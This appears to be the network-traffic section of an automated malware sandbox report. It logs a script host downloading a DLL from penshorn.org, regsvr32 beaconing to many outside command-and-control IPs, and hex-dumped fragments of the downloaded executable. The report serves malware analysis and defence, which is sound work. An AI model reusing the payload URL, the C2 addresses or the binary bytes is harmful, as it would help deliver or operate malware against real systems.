Mar 17, 2023 09:25:34.404129028 CET	49715	8080	192.168.2.7	163.44.196.120
Mar 17, 2023 09:25:34.614021063 CET	8080	49715	163.44.196.120	192.168.2.7
Mar 17, 2023 09:25:40.012115955 CET	49716	8080	192.168.2.7	160.16.142.56
Mar 17, 2023 09:25:43.061146975 CET	49716	8080	192.168.2.7	160.16.142.56
Mar 17, 2023 09:25:49.061593056 CET	49716	8080	192.168.2.7	160.16.142.56
Mar 17, 2023 09:25:58.208606958 CET	49717	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:58.208659887 CET	443	49717	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:58.208744049 CET	49717	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:58.213674068 CET	49717	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:58.213706970 CET	443	49717	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:58.479232073 CET	443	49717	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:58.880000114 CET	49718	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:58.880101919 CET	443	49718	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:58.880208969 CET	49718	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:58.881086111 CET	49718	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:58.881114960 CET	443	49718	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.167011976 CET	443	49718	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.205351114 CET	49719	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:59.205420971 CET	443	49719	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.205564022 CET	49719	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:59.207029104 CET	49719	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:59.207051992 CET	443	49719	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.507586956 CET	443	49719	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.543200016 CET	49720	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:59.543277025 CET	443	49720	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.543430090 CET	49720	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:59.544641972 CET	49720	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:25:59.544662952 CET	443	49720	159.89.202.34	192.168.2.7
Mar 17, 2023 09:25:59.804208040 CET	443	49720	159.89.202.34	192.168.2.7
Mar 17, 2023 09:26:05.464158058 CET	49721	8080	192.168.2.7	159.65.88.10
Mar 17, 2023 09:26:05.495265007 CET	8080	49721	159.65.88.10	192.168.2.7
Mar 17, 2023 09:26:06.012772083 CET	49721	8080	192.168.2.7	159.65.88.10
Mar 17, 2023 09:26:06.043566942 CET	8080	49721	159.65.88.10	192.168.2.7
Mar 17, 2023 09:26:06.552252054 CET	49721	8080	192.168.2.7	159.65.88.10
Mar 17, 2023 09:26:06.583794117 CET	8080	49721	159.65.88.10	192.168.2.7
Mar 17, 2023 09:26:11.959590912 CET	49722	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:11.959666967 CET	443	49722	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:11.959827900 CET	49722	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:11.961047888 CET	49722	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:11.961105108 CET	443	49722	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.183110952 CET	443	49722	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.184447050 CET	49723	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.184550047 CET	443	49723	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.184705973 CET	49723	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.187160015 CET	49723	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.187237024 CET	443	49723	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.417077065 CET	443	49723	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.418129921 CET	49724	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.418184996 CET	443	49724	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.418289900 CET	49724	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.419430971 CET	49724	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.419471979 CET	443	49724	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.651916027 CET	443	49724	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.653819084 CET	49725	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.653891087 CET	443	49725	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.654051065 CET	49725	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.656152010 CET	49725	443	192.168.2.7	186.194.240.217
Mar 17, 2023 09:26:12.656187057 CET	443	49725	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:12.878073931 CET	443	49725	186.194.240.217	192.168.2.7
Mar 17, 2023 09:26:19.139226913 CET	49726	8080	192.168.2.7	149.56.131.28
Mar 17, 2023 09:26:19.245171070 CET	8080	49726	149.56.131.28	192.168.2.7
Mar 17, 2023 09:26:19.864545107 CET	49726	8080	192.168.2.7	149.56.131.28
Mar 17, 2023 09:26:19.970493078 CET	8080	49726	149.56.131.28	192.168.2.7
Mar 17, 2023 09:26:20.655531883 CET	49726	8080	192.168.2.7	149.56.131.28
Mar 17, 2023 09:26:20.761640072 CET	8080	49726	149.56.131.28	192.168.2.7
Mar 17, 2023 09:26:26.214764118 CET	49727	8080	192.168.2.7	72.15.201.15
Mar 17, 2023 09:26:29.218682051 CET	49727	8080	192.168.2.7	72.15.201.15
Mar 17, 2023 09:26:35.219151020 CET	49727	8080	192.168.2.7	72.15.201.15
Mar 17, 2023 09:26:42.219425917 CET	49728	8080	192.168.2.7	1.234.2.232
Mar 17, 2023 09:26:42.492060900 CET	8080	49728	1.234.2.232	192.168.2.7
Mar 17, 2023 09:26:43.001161098 CET	49728	8080	192.168.2.7	1.234.2.232
Mar 17, 2023 09:26:43.273173094 CET	8080	49728	1.234.2.232	192.168.2.7
Mar 17, 2023 09:26:43.782351017 CET	49728	8080	192.168.2.7	1.234.2.232
Mar 17, 2023 09:26:44.054414034 CET	8080	49728	1.234.2.232	192.168.2.7
Mar 17, 2023 09:26:49.461982965 CET	49729	8080	192.168.2.7	82.223.21.224
Mar 17, 2023 09:26:49.514240980 CET	8080	49729	82.223.21.224	192.168.2.7
Mar 17, 2023 09:26:50.017323971 CET	49729	8080	192.168.2.7	82.223.21.224
Mar 17, 2023 09:26:50.069415092 CET	8080	49729	82.223.21.224	192.168.2.7
Mar 17, 2023 09:26:50.579828024 CET	49729	8080	192.168.2.7	82.223.21.224
Mar 17, 2023 09:26:50.631829023 CET	8080	49729	82.223.21.224	192.168.2.7
Mar 17, 2023 09:26:56.214745998 CET	49730	8080	192.168.2.7	206.189.28.199
Mar 17, 2023 09:26:56.245749950 CET	8080	49730	206.189.28.199	192.168.2.7
Mar 17, 2023 09:26:56.752301931 CET	49730	8080	192.168.2.7	206.189.28.199
Mar 17, 2023 09:26:56.783082962 CET	8080	49730	206.189.28.199	192.168.2.7
Mar 17, 2023 09:26:57.291882038 CET	49730	8080	192.168.2.7	206.189.28.199
Mar 17, 2023 09:26:57.322743893 CET	8080	49730	206.189.28.199	192.168.2.7
Mar 17, 2023 09:27:02.711971998 CET	49731	8080	192.168.2.7	169.57.156.166
Mar 17, 2023 09:27:05.721744061 CET	49731	8080	192.168.2.7	169.57.156.166
Mar 17, 2023 09:27:11.737926006 CET	49731	8080	192.168.2.7	169.57.156.166
Mar 17, 2023 09:27:18.969412088 CET	49732	8080	192.168.2.7	107.170.39.149
Mar 17, 2023 09:27:19.067848921 CET	8080	49732	107.170.39.149	192.168.2.7
Mar 17, 2023 09:27:19.582372904 CET	49732	8080	192.168.2.7	107.170.39.149
Mar 17, 2023 09:27:19.680506945 CET	8080	49732	107.170.39.149	192.168.2.7
Mar 17, 2023 09:27:20.191730976 CET	49732	8080	192.168.2.7	107.170.39.149
Mar 17, 2023 09:27:37.715127945 CET	49733	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:37.715200901 CET	443	49733	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:37.715487957 CET	49733	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:37.716166973 CET	49733	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:37.716187000 CET	443	49733	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.000520945 CET	443	49733	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.003062010 CET	49734	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.003096104 CET	443	49734	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.003233910 CET	49734	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.013165951 CET	49734	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.013190985 CET	443	49734	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.297833920 CET	443	49734	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.299402952 CET	49735	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.299468994 CET	443	49735	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.299577951 CET	49735	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.300442934 CET	49735	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.300476074 CET	443	49735	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.588125944 CET	443	49735	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.589185953 CET	49736	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.589250088 CET	443	49736	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.589351892 CET	49736	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.590403080 CET	49736	443	192.168.2.7	103.43.75.120
Mar 17, 2023 09:27:38.590429068 CET	443	49736	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:38.874927044 CET	443	49736	103.43.75.120	192.168.2.7
Mar 17, 2023 09:27:44.216758013 CET	49737	8080	192.168.2.7	91.207.28.33
Mar 17, 2023 09:27:47.209675074 CET	49737	8080	192.168.2.7	91.207.28.33
Mar 17, 2023 09:27:53.319628954 CET	49737	8080	192.168.2.7	91.207.28.33
Mar 17, 2023 09:28:02.219301939 CET	49738	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.219363928 CET	443	49738	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.219553947 CET	49738	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.220259905 CET	49738	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.220283031 CET	443	49738	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.246296883 CET	443	49738	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.253222942 CET	49739	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.253283978 CET	443	49739	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.253370047 CET	49739	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.254019976 CET	49739	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.254062891 CET	443	49739	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.280626059 CET	443	49739	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.281580925 CET	49740	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.281683922 CET	443	49740	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.281816959 CET	49740	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.282418013 CET	49740	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.282437086 CET	443	49740	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.307451010 CET	443	49740	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.308891058 CET	49741	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.308944941 CET	443	49741	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.309031010 CET	49741	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.309667110 CET	49741	443	192.168.2.7	213.239.212.5
Mar 17, 2023 09:28:02.309685946 CET	443	49741	213.239.212.5	192.168.2.7
Mar 17, 2023 09:28:02.334445000 CET	443	49741	213.239.212.5	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 09:24:03.897479057 CET	50330	53	192.168.2.7	8.8.8.8
Mar 17, 2023 09:24:04.194911957 CET	53	50330	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2023 09:24:03.897479057 CET	192.168.2.7	8.8.8.8	0xd5f	Standard query (0)	penshorn.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2023 09:24:04.194911957 CET	8.8.8.8	192.168.2.7	0xd5f	No error (0)	penshorn.org		203.26.41.131	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

penshorn.org

182.162.143.56

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49701	203.26.41.131	443	C:\Windows\SysWOW64\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49707	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49708	187.63.160.88	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Mar 17, 2023 09:25:07.198616982 CET	783	OUT	Data Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 94 63 ea 8a 1d 6f 70 59 dd 90 77 9c 1e 43 25 43 be dc 84 71 33 ce 84 d0 dc f5 8f be 5f 73 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: dcopYwC%Cq3_s*,+0/$#('=<5/@#
Mar 17, 2023 09:25:07.444271088 CET	784	IN	Data Raw: 16 03 03 00 41 02 00 00 3d 03 03 ea 67 f0 d8 29 03 08 9e b6 75 5c b9 ad b7 93 33 32 46 37 30 6f ad 58 32 29 d3 29 77 07 9a b9 d1 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8 Data Ascii: A=g)u\32F70oX2))w0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
Mar 17, 2023 09:25:07.444314003 CET	784	IN	Data Raw: f6 61 3e 2c f5 ff 16 d2 7b 02 2c 80 c5 da 2e bf 25 48 f4 d4 b6 8d 5d a7 1f c5 3e ac 7d 05 07 ec e9 ff 02 9e 1d 4d a5 c7 c6 06 2e 1a cb b0 8d 41 19 53 2d f6 62 7a a3 21 a8 79 25 ab a3 34 a5 45 2c f3 f1 11 7d 16 03 03 00 04 0e 00 00 00 Data Ascii: a>,{,.%H]>}M.AS-bz!y%4E,}
Mar 17, 2023 09:25:07.447803020 CET	785	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 57 cb ab cb 5a e3 61 af c3 3d d8 82 b7 6f 1b 56 f2 57 94 c6 83 7c c3 a1 60 6e 76 10 bb 0a 6c 6d 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 e2 a6 53 05 e0 54 0d 0e 99 74 79 04 63 07 e9 c7 78 c4 a5 8d 77 Data Ascii: %! WZa=oVW\|`nvlm(STtycxw-O
Mar 17, 2023 09:25:07.676604033 CET	785	IN	Data Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 10 89 c3 7c 2b 3e ca 5c d8 d0 49 9d 78 ef 6b d9 b1 4e 00 ec c0 fa ce ac 45 8c e0 83 20 16 70 d8 49 3e cb 8b 2d 82 a9 11 5f ab 89 16 d8 40 42 f0 cd d0 5b Data Ascii: ,A1NatBI\|+>\IxkNE pI>-_@B[Du?9^(T?],d>l>Q=8E0b-R)aED3A<Oj`iY*k(CCCR:x0UM{NR
Mar 17, 2023 09:25:07.679683924 CET	785	OUT	Data Raw: 17 03 03 00 96 00 00 00 00 00 00 00 01 0d 41 e2 fc d9 03 95 4c b1 28 03 17 23 2d ff 8b 8e a6 7d 9a 40 6b 4d 92 d9 6f f3 1c a8 d8 98 70 40 fd 44 44 97 d6 ad 59 03 4a 62 81 08 f1 d9 a6 30 37 3c 65 cd de a3 cb e0 b6 3f 4f 9c da 13 5f f0 a3 49 1c 94 Data Ascii: AL(#-}@kMop@DDYJb07<e?O_IS(}(n&M[qnMf`V=be~U(m/t(ijl
Mar 17, 2023 09:25:08.992017984 CET	786	IN	Data Raw: 17 03 03 01 3e fe 9b d8 43 ce b3 84 44 09 aa 18 b7 0e 75 75 d6 11 cd 10 61 95 07 43 e7 11 88 be 36 50 8a ff d5 cb 29 74 95 f8 48 67 9d 3f b5 d9 4f b0 48 fa 4c 1a e8 9b 75 a5 8d f6 66 40 e5 d5 76 c0 ce 02 d9 4b 9f 46 dd dd 1a f1 89 33 a9 ca e4 9a Data Ascii: >CDuuaC6P)tHg?OHLuf@vKF3#,$DW%)={m8-Gm\h/:ll,1W?d>,ZZMBQErumOdrhdKO<oD=@X=2;y
Mar 17, 2023 09:25:11.990458965 CET	786	IN	Data Raw: 15 03 03 00 1a fe 9b d8 43 ce b3 84 45 c6 25 eb 4d 75 ce 0f 2c 36 eb 8d f3 68 b0 78 97 5d b5 Data Ascii: CE%Mu,6hx]
Mar 17, 2023 09:25:11.990818024 CET	786	OUT	Data Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 14 77 44 de 94 a6 f7 10 f0 01 86 b3 7f d7 57 d7 cf 25 Data Ascii: wDW%

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49701	203.26.41.131	443	C:\Windows\SysWOW64\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 08:24:05 UTC	0	OUT	GET /admin/Ses8712iGR8du/ HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: penshorn.org
2023-03-17 08:24:05 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 17 Mar 2023 08:24:05 GMT Server: Apache X-Powered-By: PHP/7.0.33 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 17 Mar 2023 08:24:05 GMT Content-Disposition: attachment; filename="B0q0jy0MtW4.dll" Content-Transfer-Encoding: binary Set-Cookie: 641423a5303dc=1679041445; expires=Fri, 17-Mar-2023 08:25:05 GMT; Max-Age=60; path=/ Last-Modified: Fri, 17 Mar 2023 08:24:05 GMT Connection: close Transfer-Encoding: chunked Content-Type: application/x-msdownload
2023-03-17 08:24:05 UTC	0	IN	Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
2023-03-17 08:24:05 UTC	8	IN	Data Raw: f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3 04 4c 3b Data Ascii: BDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHDL;
2023-03-17 08:24:05 UTC	16	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:05 UTC	16	IN	Data Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
2023-03-17 08:24:05 UTC	24	IN	Data Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00 Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
2023-03-17 08:24:05 UTC	32	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:05 UTC	32	IN	Data Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
2023-03-17 08:24:05 UTC	40	IN	Data Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
2023-03-17 08:24:05 UTC	48	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:24:05 UTC	48	IN	Data Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d Data Ascii: 